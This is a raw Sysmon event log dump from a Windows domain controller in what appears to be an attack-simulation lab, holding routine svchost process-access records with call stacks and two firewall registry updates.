13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\PolicyVersionDWORD (0x0000021a) 13241300x800000000000000010397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:20.508{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|M=microsoft.aad.brokerplugin_cw5n1h2txyewy|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|D=C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\|PFN=Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 